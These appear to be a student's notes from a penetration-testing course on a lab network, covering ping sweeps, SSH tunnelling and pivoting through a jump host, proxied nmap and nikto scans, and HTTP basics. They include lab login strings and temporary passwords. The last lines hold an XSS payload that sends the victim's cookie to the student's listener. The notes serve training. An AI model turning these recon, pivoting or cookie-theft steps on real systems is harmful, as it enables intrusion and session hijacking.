##Security NOTES

Links: 
https://github.com/nmap/nmap/tree/master/scripts

windows op station ip: 10.50.38.32
linux op station ip: 10.50.21.11

##DAY 1 (Pen Testing)

http://10.50.20.250:8000

Login: 
THHU-505-M X312RSxndiF2sbo  Grey Host: 10.50.35.130

Most common pen testing will start with social networking and getting an inside source for pen testing.

Data Collection:
    Web Data
    Sensitive Data
    Publicly Accessible
    Social Media
    Domain and IP Data

*Ping network then narrow down and nmap the hosts remaining
*ping sweep -> nmap -> banner grab

Script location:

/usr/share/nmap/scripts

Demo Notes:

ssh -MS /tmp/gray student@10.50.35.130 (anything that goes herewill go through your box)

ping sweep command:
for i in {1..254}; do (ping -c 1 192.168.28.$i | grep "bytes from" &);done

(on lin-ops) ssh -S /tmp/gray gray -O forward -D 9050
(on lin-ops new tunnel goes through gray host)ssh -S /tmp/gray gray -O forward -L 41900:192.168.28.111:80
ssh -S /tmp/gray gray -O forward -L 41901:192.168.28.111:22

ssh -MS /tmp/comrade comrade@27.0.0.1 -p 41901

proxychains nmap -v -sT -Pn -T4 --script=http-enum.nse 192.168.28.111 -p 80

smb discovery

Scheme of Maneuver:
>Jump Box
->Network scan: 192.168.28.96/27
-->Network scan:192.168.150.224/27

Target Section:

Network scans:
Network: 192.168.28.96/27
Network:192.168.150.224/27
OSs: unknown
Creds: student ::
Known Ports: unknown
Known URL: consulting.site.donovia
Known URL: conference.site.donovia
Action: Reconnaissance to collect intelligence and identify possible avenues of approach in the network.

Temp Passes:

houseBeatFliesLOW
YourTempPassword

##DAY 2 Web Exploitation

HTTP Response Codes
    10X == Informational
    2XX == Success
    30X == Redirection
    4XX == Client Error
    5XX == Server Error
https://tools.ietf.org/html/rfc2616

HTTP Fields
    User-Agent
    Referer
    Cookie
    Date
    Server
    Set-Cookie
Demos:
nmap --script http-enum.nse 10.50.45.126 -p80
nikto -host 10.50.45.126

python3 -m http.server
<scrit>document.location="http://10.50.21.11:8000/"+document.cookie;<script







































































